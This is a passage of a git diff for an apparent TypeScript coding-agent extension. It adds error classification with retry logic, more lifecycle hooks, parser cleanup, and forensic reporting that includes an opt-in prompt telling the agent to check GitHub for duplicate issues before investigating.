"permanent" } + | { kind: "unknown" }; + +// ── RetryState ────────────────────────────────────────────────────────────── + +export interface RetryState { + networkRetryCount: number; + consecutiveTransientCount: number; + currentRetryModelId: string | undefined; +} + +export function createRetryState(): RetryState { + return { networkRetryCount: 0, consecutiveTransientCount: 0, currentRetryModelId: undefined }; +} + +export function resetRetryState(state: RetryState): void { + state.networkRetryCount = 0; + state.consecutiveTransientCount = 0; + state.currentRetryModelId = undefined; +} + +// ── Classification ────────────────────────────────────────────────────────── + +const PERMANENT_RE = /auth|unauthorized|forbidden|invalid.*key|invalid.*api|billing|quota exceeded|account/i; +const RATE_LIMIT_RE = /rate.?limit|too many requests|429/i; +const NETWORK_RE = /network|ECONNRESET|ETIMEDOUT|ECONNREFUSED|socket hang up|fetch failed|connection.*reset|dns/i; +const SERVER_RE = /internal server error|500|502|503|overloaded|server_error|api_error|service.?unavailable/i; +// ECONNRESET/ECONNREFUSED are in NETWORK_RE (same-model retry first). +const CONNECTION_RE = /terminated|connection.?refused|other side closed|EPIPE|network.?(?:is\s+)?unavailable|stream_exhausted(?:_without_result)?/i; +// Catch-all for V8 JSON.parse errors: all modern variants end with "in JSON at position \d+". +// This eliminates the need to enumerate every error message variant individually. +const STREAM_RE = /in JSON at position \d+|Unexpected end of JSON|SyntaxError.*JSON/i; +const RESET_DELAY_RE = /reset in (\d+)s/i; + +/** + * Classify an error message into one of the ErrorClass kinds. + * + * Classification order: + * 1. Permanent (auth/billing/quota) — unless also rate-limited + * 2. Rate limit (429, rate.?limit, too many requests) + * 3. Network (ECONNRESET, ETIMEDOUT, socket hang up, fetch failed, dns) + * 4. Stream truncation (malformed JSON from mid-stream cut) + * 5. Server (500/502/503, overloaded, server_error) + * 6. Connection (terminated, ECONNREFUSED, EPIPE, other side closed) + * 7. Unknown + */ +export function classifyError(errorMsg: string, retryAfterMs?: number): ErrorClass { + const isPermanent = PERMANENT_RE.test(errorMsg); + const isRateLimit = RATE_LIMIT_RE.test(errorMsg); + + // 1. Permanent — but rate limit takes precedence + if (isPermanent && !isRateLimit) { + return { kind: "permanent" }; + } + + // 2. Rate limit + if (isRateLimit) { + if (retryAfterMs != null && retryAfterMs > 0) { + return { kind: "rate-limit", retryAfterMs }; + } + const resetMatch = errorMsg.match(RESET_DELAY_RE); + const delayMs = resetMatch ? Number(resetMatch[1]) * 1000 : 60_000; + return { kind: "rate-limit", retryAfterMs: delayMs }; + } + + // 3. Network errors — same-model retry candidate + if (NETWORK_RE.test(errorMsg)) { + // Exclude if also matches permanent signals (already handled above for + // rate-limit, but double-check for non-rate-limit permanent overlap like + // "billing" appearing alongside "network"). + return { kind: "network", retryAfterMs: retryAfterMs ?? 3_000 }; + } + + // 4. Stream truncation — downstream symptom of connection drop + if (STREAM_RE.test(errorMsg)) { + return { kind: "stream", retryAfterMs: retryAfterMs ?? 15_000 }; + } + + // 5. Server errors — try fallback model + if (SERVER_RE.test(errorMsg)) { + return { kind: "server", retryAfterMs: retryAfterMs ?? 30_000 }; + } + + // 6. Connection errors — try fallback model + if (CONNECTION_RE.test(errorMsg)) { + return { kind: "connection", retryAfterMs: retryAfterMs ?? 15_000 }; + } + + // 7. Unknown + return { kind: "unknown" }; +} + +// ── Helpers ───────────────────────────────────────────────────────────────── + +/** Returns true for all transient (auto-resumable) error kinds. */ +export function isTransient(cls: ErrorClass): boolean { + switch (cls.kind) { + case "network": + case "rate-limit": + case "server": + case "stream": + case "connection": + return true; + default: + return false; + } +} + +/** + * Backward-compatible thin wrapper. + * + * Returns true when the error is a transient *network* error specifically + * (worth retrying the same model). Permanent signals (auth, billing, quota) + * cause this to return false even if a network keyword is present. + */ +export function isTransientNetworkError(errorMsg: string): boolean { + if (!errorMsg) return false; + const cls = classifyError(errorMsg); + return cls.kind === "network"; +} diff --git a/src/resources/extensions/gsd/extension-manifest.json b/src/resources/extensions/gsd/extension-manifest.json index a1b2877be..ca0063a5f 100644 --- a/src/resources/extensions/gsd/extension-manifest.json +++ b/src/resources/extensions/gsd/extension-manifest.json @@ -12,7 +12,22 @@ "gsd_requirement_update", "gsd_milestone_generate_id" ], "commands": ["gsd", "kill", "worktree", "exit"], - "hooks": ["session_start"], + "hooks": [ + "session_start", + "session_switch", + "bash_transform", + "session_fork", + "before_agent_start", + "agent_end", + "session_before_compact", + "session_shutdown", + "tool_call", + "tool_result", + "tool_execution_start", + "tool_execution_end", + "model_select", + "before_provider_request" + ], "shortcuts": ["Ctrl+Alt+G"] } } diff --git a/src/resources/extensions/gsd/file-watcher.ts b/src/resources/extensions/gsd/file-watcher.ts index 98928ed62..a8b0be19c 100644 --- a/src/resources/extensions/gsd/file-watcher.ts +++ b/src/resources/extensions/gsd/file-watcher.ts @@ -3,6 +3,7 @@ import type { EventBus } from "@gsd/pi-coding-agent"; import { relative } from "node:path"; let watcher: FSWatcher | null = null; +let pending = new Map>(); const EVENT_MAP: Record = { "settings.json": "settings-changed", @@ -36,7 +37,7 @@ export async function startFileWatcher( const { watch } = await import("chokidar"); - const pending = new Map>(); + pending = new Map>(); function debounceEmit(event: string): void { const existing = pending.get(event); @@ -90,6 +91,8 @@ export async function startFileWatcher( * Stop the file watcher and clean up resources. */ export async function stopFileWatcher(): Promise { + for (const timer of pending.values()) clearTimeout(timer); + pending.clear(); if (watcher) { await watcher.close(); watcher = null; diff --git a/src/resources/extensions/gsd/files.ts b/src/resources/extensions/gsd/files.ts index c5d7fada0..a59a8773a 100644 --- a/src/resources/extensions/gsd/files.ts +++ b/src/resources/extensions/gsd/files.ts @@ -10,8 +10,7 @@ import { resolveMilestoneFile, relMilestoneFile, resolveGsdRootFile } from './pa import { milestoneIdSort, findMilestoneIds } from './milestone-ids.js'; import type { - Roadmap, BoundaryMapEntry, - SlicePlan, TaskPlanEntry, TaskPlanFile, TaskPlanFrontmatter, + TaskPlanFile, TaskPlanFrontmatter, Summary, SummaryFrontmatter, SummaryRequires, FileModified, Continue, ContinueFrontmatter, ContinueStatus, RequirementCounts, @@ -21,9 +20,7 @@ import type { } from './types.js'; import { checkExistingEnvKeys } from './env-utils.js'; -import { parseRoadmapSlices } from './roadmap-slices.js'; -import { nativeParseRoadmap, nativeExtractSection, nativeParsePlanFile, nativeParseSummaryFile, NATIVE_UNAVAILABLE } from './native-parser-bridge.js'; -import { debugTime, debugCount } from './debug-logger.js'; +import { nativeExtractSection, nativeParseSummaryFile, NATIVE_UNAVAILABLE } from './native-parser-bridge.js'; import { CACHE_MAX } from './constants.js'; import { splitFrontmatter, parseFrontmatterMap } from '../shared/frontmatter.js'; @@ -55,9 +52,41 @@ function cachedParse(content: string, tag: string, parseFn: (c: string) => T) return result; } -/** Clear the module-scoped parse cache. Call when files change on disk. */ +// ─── Cross-module cache clear registry ──────────────────────────────────── +// parsers-legacy.ts registers its cache-clear callback here at module init +// to avoid circular imports. clearParseCache() calls all registered callbacks. +const _cacheClearCallbacks: (() => void)[] = []; + +/** Register a callback to be invoked when clearParseCache() is called. + * Used by parsers-legacy.ts to synchronously clear its own cache. */ +export function registerCacheClearCallback(cb: () => void): void { + _cacheClearCallbacks.push(cb); +} + +/** Clear the module-scoped parse cache. Call when files change on disk. + * Also clears any registered external caches (e.g. parsers-legacy.ts). */ export function clearParseCache(): void { _parseCache.clear(); + for (const cb of _cacheClearCallbacks) cb(); +} + +// ─── Platform shortcuts ─────────────────────────────────────────────────── + +const IS_MAC = process.platform === "darwin"; + +/** + * Format a keyboard shortcut for the current OS. + * Input: modifier key combo like "Ctrl+Alt+G" + * Output: "⌃⌥G" on macOS, "Ctrl+Alt+G" on Windows/Linux. + */ +export function formatShortcut(combo: string): string { + if (!IS_MAC) return combo; + return combo + .replace(/Ctrl\+Alt\+/i, "⌃⌥") + .replace(/Ctrl\+/i, "⌃") + .replace(/Alt\+/i, "⌥") + .replace(/Shift\+/i, "⇧") + .replace(/Cmd\+/i, "⌘"); } // ─── Helpers ─────────────────────────────────────────────────────────────── @@ -103,6 +132,25 @@ function escapeRegex(s: string): string { return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); } +/** + * Normalize a task-plan file reference that may include inline description text + * after the path, for example: + * "docs/file.md — explanation" + * "docs/file.md - explanation" + */ +export function normalizePlannedFileReference(value: string): string { + const trimmed = value.trim().replace(/`/g, ""); + const match = /^(.*?)(?:\s+(?:—|-)\s+)(.+)$/.exec(trimmed); + if (!match) return trimmed; + + const pathCandidate = match[1].trim(); + if (pathCandidate.includes("/") || pathCandidate.includes("\\") || pathCandidate.includes(".")) { + return pathCandidate; + } + + return trimmed; +} + /** Parse bullet list items from a text block. */ export function parseBullets(text: string): string[] { return text.split('\n') @@ -117,95 +165,6 @@ export function extractBoldField(text: string, key: string): string | null { return match ? match[1].trim() : null; } -// ─── Roadmap Parser ──────────────────────────────────────────────────────── - -export function parseRoadmap(content: string): Roadmap { - return cachedParse(content, 'roadmap', _parseRoadmapImpl); -} - -function _parseRoadmapImpl(content: string): Roadmap { - const stopTimer = debugTime("parse-roadmap"); - // Try native parser first for better performance - const nativeResult = nativeParseRoadmap(content); - if (nativeResult) { - stopTimer({ native: true, slices: nativeResult.slices.length, boundaryEntries: nativeResult.boundaryMap.length }); - debugCount("parseRoadmapCalls"); - return nativeResult; - } - - const lines = content.split('\n'); - - const h1 = lines.find(l => l.startsWith('# ')); - const title = h1 ? h1.slice(2).trim() : ''; - const vision = extractBoldField(content, 'Vision') || ''; - - const scSection = extractSection(content, 'Success Criteria', 2) || - (() => { - const idx = content.indexOf('**Success Criteria:**'); - if (idx === -1) return ''; - const rest = content.slice(idx); - const nextSection = rest.indexOf('\n---'); - const block = rest.slice(0, nextSection === -1 ? undefined : nextSection); - const firstNewline = block.indexOf('\n'); - return firstNewline === -1 ? '' : block.slice(firstNewline + 1); - })(); - const successCriteria = scSection ? parseBullets(scSection) : []; - - // Slices - const slices = parseRoadmapSlices(content); - - // Boundary map - const boundaryMap: BoundaryMapEntry[] = []; - const bmSection = extractSection(content, 'Boundary Map'); - - if (bmSection) { - const h3Sections = extractAllSections(bmSection, 3); - for (const [heading, sectionContent] of h3Sections) { - const arrowMatch = heading.match(/^(\S+)\s*→\s*(\S+)/); - if (!arrowMatch) continue; - - const fromSlice = arrowMatch[1]; - const toSlice = arrowMatch[2]; - - let produces = ''; - let consumes = ''; - - // Use indexOf-based parsing instead of [\s\S]*? regex to avoid - // catastrophic backtracking on content with code fences (#468). - const prodIdx = sectionContent.search(/^Produces:\s*$/m); - if (prodIdx !== -1) { - const afterProd = sectionContent.indexOf('\n', prodIdx); - if (afterProd !== -1) { - const consIdx = sectionContent.search(/^Consumes/m); - const endIdx = consIdx !== -1 && consIdx > afterProd ? consIdx : sectionContent.length; - produces = sectionContent.slice(afterProd + 1, endIdx).trim(); - } - } - - const consLineMatch = sectionContent.match(/^Consumes[^:]*:\s*(.+)$/m); - if (consLineMatch) { - consumes = consLineMatch[1].trim(); - } - if (!consumes) { - const consIdx = sectionContent.search(/^Consumes[^:]*:\s*$/m); - if (consIdx !== -1) { - const afterCons = sectionContent.indexOf('\n', consIdx); - if (afterCons !== -1) { - consumes = sectionContent.slice(afterCons + 1).trim(); - } - } - } - - boundaryMap.push({ fromSlice, toSlice, produces, consumes }); - } - } - - const result = { title, vision, successCriteria, slices, boundaryMap }; - stopTimer({ native: false, slices: slices.length, boundaryEntries: boundaryMap.length }); - debugCount("parseRoadmapCalls"); - return result; -} - // ─── Secrets Manifest Parser ─────────────────────────────────────────────── const VALID_STATUSES = new Set(['pending', 'collected', 'skipped']); @@ -314,131 +273,6 @@ export function parseTaskPlanFile(content: string): TaskPlanFile { }; } -export function parsePlan(content: string): SlicePlan { - return cachedParse(content, 'plan', _parsePlanImpl); -} - -function _parsePlanImpl(content: string): SlicePlan { - const stopTimer = debugTime("parse-plan"); - const [, body] = splitFrontmatter(content); - // Try native parser first for better performance - const nativeResult = nativeParsePlanFile(body); - if (nativeResult) { - stopTimer({ native: true }); - return { - id: nativeResult.id, - title: nativeResult.title, - goal: nativeResult.goal, - demo: nativeResult.demo, - mustHaves: nativeResult.mustHaves, - tasks: nativeResult.tasks.map(t => ({ - id: t.id, - title: t.title, - description: t.description, - done: t.done, - estimate: t.estimate, - ...(t.files.length > 0 ? { files: t.files } : {}), - ...(t.verify ? { verify: t.verify } : {}), - })), - filesLikelyTouched: nativeResult.filesLikelyTouched, - }; - } - - const lines = body.split('\n'); - - const h1 = lines.find(l => l.startsWith('# ')); - let id = ''; - let title = ''; - if (h1) { - const match = h1.match(/^#\s+(\w+):\s+(.+)/); - if (match) { - id = match[1]; - title = match[2].trim(); - } else { - title = h1.slice(2).trim(); - } - } - - const goal = extractBoldField(body, 'Goal') || ''; - const demo = extractBoldField(body, 'Demo') || ''; - - const mhSection = extractSection(body, 'Must-Haves'); - const mustHaves = mhSection ? parseBullets(mhSection) : []; - - const tasksSection = extractSection(body, 'Tasks'); - const tasks: TaskPlanEntry[] = []; - - if (tasksSection) { - const taskLines = tasksSection.split('\n'); - let currentTask: TaskPlanEntry | null = null; - - for (const line of taskLines) { - const cbMatch = line.match(/^-\s+\[([ xX])\]\s+\*\*([\w.]+):\s+(.+?)\*\*\s*(.*)/); - // Heading-style: ### T01 -- Title, ### T01: Title, ### T01 — Title - const hdMatch = !cbMatch ? line.match(/^#{2,4}\s+([\w.]+)\s*(?:--|—|:)\s*(.+)/) : null; - if (cbMatch || hdMatch) { - if (currentTask) tasks.push(currentTask); - - if (cbMatch) { - const rest = cbMatch[4] || ''; - const estMatch = rest.match(/`est:([^`]+)`/); - const estimate = estMatch ? estMatch[1] : ''; - - currentTask = { - id: cbMatch[2], - title: cbMatch[3], - description: '', - done: cbMatch[1].toLowerCase() === 'x', - estimate, - }; - } else { - const rest = hdMatch![2] || ''; - const titleEstMatch = rest.match(/^(.+?)\s*`est:([^`]+)`\s*$/); - const title = titleEstMatch ? titleEstMatch[1].trim() : rest.trim(); - const estimate = titleEstMatch ? titleEstMatch[2] : ''; - - currentTask = { - id: hdMatch![1], - title, - description: '', - done: false, - estimate, - }; - } - } else if (currentTask && line.match(/^\s*-\s+Files:\s*(.*)/)) { - const filesMatch = line.match(/^\s*-\s+Files:\s*(.*)/); - if (filesMatch) { - currentTask.files = filesMatch[1] - .split(',') - .map(f => f.replace(/`/g, '').trim()) - .filter(f => f.length > 0); - } - } else if (currentTask && line.match(/^\s*-\s+Verify:\s*(.*)/)) { - const verifyMatch = line.match(/^\s*-\s+Verify:\s*(.*)/); - if (verifyMatch) { - currentTask.verify = verifyMatch[1].trim(); - } - } else if (currentTask && line.trim() && !line.startsWith('#')) { - const desc = line.trim(); - if (desc) { - currentTask.description = currentTask.description - ? currentTask.description + ' ' + desc - : desc; - } - } - } - if (currentTask) tasks.push(currentTask); - } - - const filesSection = extractSection(body, 'Files Likely Touched'); - const filesLikelyTouched = filesSection ? parseBullets(filesSection) : []; - - const result = { id, title, goal, demo, mustHaves, tasks, filesLikelyTouched }; - stopTimer({ tasks: tasks.length }); - debugCount("parsePlanCalls"); - return result; -} - // ─── Summary Parser ──────────────────────────────────────────────────────── export function parseSummary(content: string): Summary { @@ -473,6 +307,8 @@ function _parseSummaryImpl(content: string): Summary { whatHappened: nativeResult.whatHappened, deviations: nativeResult.deviations, filesModified: nativeResult.filesModified, + followUps: extractSection(content, 'Follow-ups') ?? '', + knownLimitations: extractSection(content, 'Known Limitations') ?? '', }; } @@ -534,7 +370,10 @@ function _parseSummaryImpl(content: string): Summary { } } - return { frontmatter, title, oneLiner, whatHappened, deviations, filesModified }; + const followUps = extractSection(body, 'Follow-ups') ?? ''; + const knownLimitations = extractSection(body, 'Known Limitations') ?? ''; + + return { frontmatter, title, oneLiner, whatHappened, deviations, filesModified, followUps, knownLimitations }; } // ─── Continue Parser ─────────────────────────────────────────────────────── @@ -802,11 +641,11 @@ export function parseTaskPlanIO(content: string): { inputFiles: string[]; output let match: RegExpExecArray | null; backtickPathRegex.lastIndex = 0; while ((match = backtickPathRegex.exec(trimmed)) !== null) { - const candidate = match[1]; + const candidate = normalizePlannedFileReference(match[1]); // Filter out things that look like code tokens rather than file paths // (e.g. `true`, `false`, `npm run test`). A file path has at least one // dot or slash. - if (candidate.includes("/") || candidate.includes(".")) { + if (candidate.includes("/") || candidate.includes("\\") || candidate.includes(".")) { paths.push(candidate); } } diff --git a/src/resources/extensions/gsd/forensics.ts b/src/resources/extensions/gsd/forensics.ts index 62c89279d..ba2746f8b 100644 --- a/src/resources/extensions/gsd/forensics.ts +++ b/src/resources/extensions/gsd/forensics.ts @@ -28,13 +28,18 @@ import { deriveState } from "./state.js"; import { isAutoActive } from "./auto.js"; import { loadPrompt } from "./prompt-loader.js"; import { gsdRoot } from "./paths.js"; +import { isDbAvailable, getAllMilestones, getMilestoneSlices, getSliceTasks } from "./gsd-db.js"; +import { isClosedStatus } from "./status-guards.js"; import { formatDuration } from "../shared/format-utils.js"; import { getAutoWorktreePath } from "./auto-worktree.js"; +import { loadEffectiveGSDPreferences, loadGlobalGSDPreferences, getGlobalGSDPreferencesPath } from "./preferences.js"; +import { showNextAction } from "../shared/tui.js"; +import { ensurePreferencesFile, serializePreferencesToFrontmatter } from "./commands-prefs-wizard.js"; // ─── Types ──────────────────────────────────────────────────────────────────── -interface ForensicAnomaly { - type: "stuck-loop" | "cost-spike" | "timeout" | "missing-artifact" | "crash" | "doctor-issue" | "error-trace"; +export interface ForensicAnomaly { + type: "stuck-loop" | "cost-spike" | "timeout" | "missing-artifact" | "crash" | "doctor-issue" | "error-trace" | "journal-stuck" | "journal-guard-block" | "journal-rapid-iterations" | "journal-worktree-failure"; severity: "info" | "warning" | "error"; unitType?: string; unitId?: string; @@ -51,6 +56,46 @@ interface UnitTrace { mtime: number; } +/** Summary of .gsd/activity/ directory metadata. */ +interface ActivityLogMeta { + fileCount: number; + totalSizeBytes: number; + oldestFile: string | null; + newestFile: string | null; +} + +/** + * Summary of .gsd/journal/ data for forensic investigation. + * + * To avoid loading huge journal histories into memory, only the most recent + * daily files are fully parsed. Older files are line-counted for totals. + * Event counts and flow IDs reflect only recent files. + */ +interface JournalSummary { + /** Total journal entries across all files (recent parsed + older line-counted) */ + totalEntries: number; + /** Distinct flow IDs from recent files (each = one auto-mode iteration) */ + flowCount: number; + /** Event counts by type (from recent files only) */ + eventCounts: Record; + /** Most recent journal entries (last 20) for context */ + recentEvents: { ts: string; flowId: string; eventType: string; rule?: string; unitId?: string }[]; + /** Date range of journal data */ + oldestEntry: string | null; + newestEntry: string | null; + /** Daily file count */ + fileCount: number; +} + +interface DbCompletionCounts { + milestones: number; + milestonesTotal: number; + slices: number; + slicesTotal: number; + tasks: number; + tasksTotal: number; +} + interface ForensicReport { gsdVersion: string; timestamp: string; @@ -61,10 +106,76 @@ interface ForensicReport { unitTraces: UnitTrace[]; metrics: MetricsLedger | null; completedKeys: string[]; + dbCompletionCounts: DbCompletionCounts | null; crashLock: LockData | null; doctorIssues: DoctorIssue[]; anomalies: ForensicAnomaly[]; recentUnits: { type: string; id: string; cost: number; duration: number; model: string; finishedAt: number }[]; + journalSummary: JournalSummary | null; + activityLogMeta: ActivityLogMeta | null; +} + +// ─── Duplicate Detection ────────────────────────────────────────────────────── + +const DEDUP_PROMPT_SECTION = ` +## Pre-Investigation: Duplicate Check (REQUIRED) + +Before reading GSD source code or performing deep analysis, you MUST search for existing issues and PRs that may already address this bug. This avoids wasting tokens on already-fixed bugs. + +### Search Steps + +Use keywords from the user's problem description and the anomaly summaries in the forensic report above. + +1. **Search closed issues** for similar keywords: + \`\`\` + gh issue list --repo gsd-build/gsd-2 --state closed --search "" --limit 20 + \`\`\` + +2. **Search open PRs** that might contain the fix: + \`\`\` + gh pr list --repo gsd-build/gsd-2 --state open --search "" --limit 10 + \`\`\` + +3. **Search merged PRs** that may have already fixed this: + \`\`\` + gh pr list --repo gsd-build/gsd-2 --state merged --search "" --limit 10 + \`\`\` + +### Analysis + +For each result, compare it against the user's reported symptoms and the forensic anomalies: +- Does the issue describe the same code path or file? +- Does the PR modify the area related to the reported symptoms? +- Is the symptom description semantically similar even if keywords differ? + +### Decision Gate + +- **Merged PR clearly fixes the described symptom** → Report "Already fixed by PR #X" with brief explanation. Skip full investigation. +- **Open issue matches** → Report "Existing issue #Y covers this." Offer to add forensic evidence. Skip full investigation unless user asks for deeper analysis. +- **No matches** → Proceed to full investigation below. +`; + +async function writeForensicsDedupPref(ctx: ExtensionCommandContext, enabled: boolean): Promise { + const prefsPath = getGlobalGSDPreferencesPath(); + await ensurePreferencesFile(prefsPath, ctx, "global"); + const existing = loadGlobalGSDPreferences(); + const prefs: Record = existing?.preferences ? { ...existing.preferences } : {}; + prefs.version = prefs.version || 1; + prefs.forensics_dedup = enabled; + + const frontmatter = serializePreferencesToFrontmatter(prefs); + const raw = existsSync(prefsPath) ? readFileSync(prefsPath, "utf-8") : ""; + let body = "\n# GSD Skill Preferences\n\nSee `~/.gsd/agent/extensions/gsd/docs/preferences-reference.md` for full field documentation and examples.\n"; + const start = raw.startsWith("---\n") ? 4 : raw.startsWith("---\r\n") ? 5 : -1; + if (start !== -1) { + const closingIdx = raw.indexOf("\n---", start); + if (closingIdx !== -1) { + const after = raw.slice(closingIdx + 4); + if (after.trim()) body = after; + } + } + + writeFileSync(prefsPath, `---\n${frontmatter}---${body}`, "utf-8"); } // ─── Entry Point ────────────────────────────────────────────────────────────── @@ -98,6 +209,29 @@ export async function handleForensics( return; } + // ─── Duplicate detection opt-in ───────────────────────────────────────────── + const effectivePrefs = loadEffectiveGSDPreferences()?.preferences; + let dedupEnabled = effectivePrefs?.forensics_dedup === true; + + if (effectivePrefs?.forensics_dedup === undefined) { + const choice = await showNextAction(ctx, { + title: "Duplicate detection available", + summary: ["Before filing a GitHub issue, forensics can search existing issues and PRs to avoid duplicates.", "This uses additional AI tokens for analysis."], + actions: [ + { id: "enable", label: "Enable duplicate detection", description: "Search issues/PRs before filing (recommended)", recommended: true }, + { id: "skip", label: "Skip for now", description: "File without checking for duplicates" }, + ], + notYetMessage: "You can enable this later via preferences (forensics_dedup: true).", + }); + + if (choice === "enable") { + await writeForensicsDedupPref(ctx, true); + dedupEnabled = true; + } + } + + const dedupSection = dedupEnabled ? DEDUP_PROMPT_SECTION : ""; + ctx.ui.notify("Building forensic report...", "info"); const report = await buildForensicReport(basePath); @@ -117,6 +251,7 @@ export async function handleForensics( problemDescription, forensicData, gsdSourceDir, + dedupSection, }); ctx.ui.notify(`Forensic report saved: ${relative(basePath, savedPath)}`, "info"); @@ -125,6 +260,9 @@ export async function handleForensics( { customType: "gsd-forensics", content, display: false }, { triggerTurn: true }, ); + + // Persist forensics context so follow-up turns can re-inject it (#2941) + writeForensicsMarker(basePath, savedPath, content); } // ─── Report Builder ─────────────────────────────────────────────────────────── @@ -150,8 +288,9 @@ export async function buildForensicReport(basePath: string): Promise f.endsWith(".jsonl")).sort(); + if (files.length === 0) return null; + + // Split into recent (fully parsed) and older (line-counted only) + const recentFiles = files.slice(-MAX_JOURNAL_RECENT_FILES); + const olderFiles = files.slice(0, -MAX_JOURNAL_RECENT_FILES); + + // Line-count older files without parsing — avoids loading megabytes of JSON + let olderEntryCount = 0; + let oldestEntry: string | null = null; + for (const file of olderFiles) { + try { + const raw = readFileSync(join(journalDir, file), "utf-8"); + const lines = raw.split("\n"); + for (const line of lines) { + if (!line.trim()) continue; + olderEntryCount++; + // Extract only the timestamp from the first non-empty line of the oldest file + if (!oldestEntry) { + try { + const parsed = JSON.parse(line) as { ts?: string }; + if (parsed.ts) oldestEntry = parsed.ts; + } catch { /* skip malformed */ } + } + } + } catch { /* skip unreadable files */ } + } + + // Fully parse recent files for event counts and timeline + const eventCounts: Record = {}; + const flowIds = new Set(); + const recentParsedEntries: { ts: string; flowId: string; eventType: string; rule?: string; unitId?: string }[] = []; + let recentEntryCount = 0; + + for (const file of recentFiles) { + try { + const raw = readFileSync(join(journalDir, file), "utf-8"); + for (const line of raw.split("\n")) { + if (!line.trim()) continue; + try { + const entry = JSON.parse(line) as { ts: string; flowId: string; eventType: string; rule?: string; data?: Record }; + recentEntryCount++; + eventCounts[entry.eventType] = (eventCounts[entry.eventType] ?? 0) + 1; + flowIds.add(entry.flowId); + + if (!oldestEntry) oldestEntry = entry.ts; + + // Keep a rolling window of last N events — avoids accumulating unbounded arrays + recentParsedEntries.push({ + ts: entry.ts, + flowId: entry.flowId, + eventType: entry.eventType, + rule: entry.rule, + unitId: entry.data?.unitId as string | undefined, + }); + if (recentParsedEntries.length > MAX_JOURNAL_RECENT_EVENTS) { + recentParsedEntries.shift(); + } + } catch { /* skip malformed lines */ } + } + } catch { /* skip unreadable files */ } + } + + const totalEntries = olderEntryCount + recentEntryCount; + if (totalEntries === 0) return null; + + const newestEntry = recentParsedEntries.length > 0 + ? recentParsedEntries[recentParsedEntries.length - 1]!.ts + : null; + + return { + totalEntries, + flowCount: flowIds.size, + eventCounts, + recentEvents: recentParsedEntries, + oldestEntry, + newestEntry, + fileCount: files.length, + }; + } catch { + return null; + } +} + +// ─── Activity Log Metadata ──────────────────────────────────────────────────── + +function gatherActivityLogMeta(basePath: string, activeMilestone?: string | null): ActivityLogMeta | null { + try { + const activityDirs = resolveActivityDirs(basePath, activeMilestone); + let fileCount = 0; + let totalSizeBytes = 0; + let oldestFile: string | null = null; + let newestFile: string | null = null; + let oldestMtime = Infinity; + let newestMtime = 0; + + for (const activityDir of activityDirs) { + if (!existsSync(activityDir)) continue; + const files = readdirSync(activityDir).filter(f => f.endsWith(".jsonl")); + for (const file of files) { + const filePath = join(activityDir, file); + const stat = statSync(filePath, { throwIfNoEntry: false }); + if (!stat) continue; + fileCount++; + totalSizeBytes += stat.size; + if (stat.mtimeMs < oldestMtime) { + oldestMtime = stat.mtimeMs; + oldestFile = file; + } + if (stat.mtimeMs > newestMtime) { + newestMtime = stat.mtimeMs; + newestFile = file; + } + } + } + + if (fileCount === 0) return null; + return { fileCount, totalSizeBytes, oldestFile, newestFile }; + } catch { + return null; + } +} + // ─── Completed Keys Loader ──────────────────────────────────────────────────── function loadCompletedKeys(basePath: string): string[] { @@ -300,15 +600,69 @@ function loadCompletedKeys(basePath: string): string[] { return []; } +// ─── DB Completion Counts ──────────────────────────────────────────────────── + +function getDbCompletionCounts(): DbCompletionCounts | null { + if (!isDbAvailable()) return null; + + const milestones = getAllMilestones(); + let completedMilestones = 0; + let totalSlices = 0; + let completedSlices = 0; + let totalTasks = 0; + let completedTasks = 0; + + for (const m of milestones) { + if (isClosedStatus(m.status)) completedMilestones++; + + const slices = getMilestoneSlices(m.id); + for (const s of slices) { + totalSlices++; + if (isClosedStatus(s.status)) completedSlices++; + + const tasks = getSliceTasks(m.id, s.id); + for (const t of tasks) { + totalTasks++; + if (isClosedStatus(t.status)) completedTasks++; + } + } + } + + return { + milestones: completedMilestones, + milestonesTotal: milestones.length, + slices: completedSlices, + slicesTotal: totalSlices, + tasks: completedTasks, + tasksTotal: totalTasks, + }; +} + // ─── Anomaly Detectors ─────────────────────────────────────────────────────── -function detectStuckLoops(units: UnitMetrics[], anomalies: ForensicAnomaly[]): void { - const counts = new Map(); +/** + * Detect units that were dispatched multiple times (stuck in a loop). + * + * Counts distinct dispatches by grouping on (type, id, startedAt) first to + * collapse idle-watchdog duplicate snapshots (#1943), then counts unique + * startedAt values per type/id to determine actual dispatch count. + * + * Exported for testability. + */ +export function detectStuckLoops(units: UnitMetrics[], anomalies: ForensicAnomaly[]): void { + // First, collect unique startedAt values per type/id key + const dispatchMap = new Map>(); for (const u of units) { const key = `${u.type}/${u.id}`; - counts.set(key, (counts.get(key) ?? 0) + 1); + let starts = dispatchMap.get(key); + if (!starts) { + starts = new Set(); + dispatchMap.set(key, starts); + } + starts.add(u.startedAt); } - for (const [key, count] of counts) { + for (const [key, starts] of dispatchMap) { + const count = starts.size; if (count > 1) { const [unitType, ...idParts] = key.split("/"); anomalies.push({ @@ -364,15 +718,42 @@ function detectTimeouts(traces: UnitTrace[], anomalies: ForensicAnomaly[]): void } } +/** + * Parse a completed-unit key into its unitType and unitId. + * + * Hook units use a compound slash-delimited type ("hook/"), so a + * naive `key.indexOf("/")` would split "hook/telegram-progress/M007/S01" into + * unitType="hook" (wrong) instead of "hook/telegram-progress". + * + * Returns `null` for malformed keys that cannot be split. + */ +export function splitCompletedKey(key: string): { unitType: string; unitId: string } | null { + if (key.startsWith("hook/")) { + // Hook unit types are two segments: "hook//" + const secondSlash = key.indexOf("/", 5); // skip past "hook/" + if (secondSlash === -1) return null; // malformed — no unitId after hook name + return { + unitType: key.slice(0, secondSlash), + unitId: key.slice(secondSlash + 1), + }; + } + + const slashIdx = key.indexOf("/"); + if (slashIdx === -1) return null; + return { + unitType: key.slice(0, slashIdx), + unitId: key.slice(slashIdx + 1), + }; +} + function detectMissingArtifacts(completedKeys: string[], basePath: string, activeMilestone: string | null, anomalies: ForensicAnomaly[]): void { // Also check the worktree path for artifacts — they may exist there but not at root const wtBasePath = activeMilestone ? getAutoWorktreePath(basePath, activeMilestone) : null; for (const key of completedKeys) { - const slashIdx = key.indexOf("/"); - if (slashIdx === -1) continue; - const unitType = key.slice(0, slashIdx); - const unitId = key.slice(slashIdx + 1); + const parsed = splitCompletedKey(key); + if (!parsed) continue; + const { unitType, unitId } = parsed; const rootHasArtifact = verifyExpectedArtifact(unitType, unitId, basePath); const wtHasArtifact = wtBasePath ? verifyExpectedArtifact(unitType, unitId, wtBasePath) : false; @@ -432,6 +813,66 @@ function detectErrorTraces(traces: UnitTrace[], anomalies: ForensicAnomaly[]): v } } +function detectJournalAnomalies(journal: JournalSummary | null, anomalies: ForensicAnomaly[]): void { + if (!journal) return; + + // Detect stuck-detected events from the journal + const 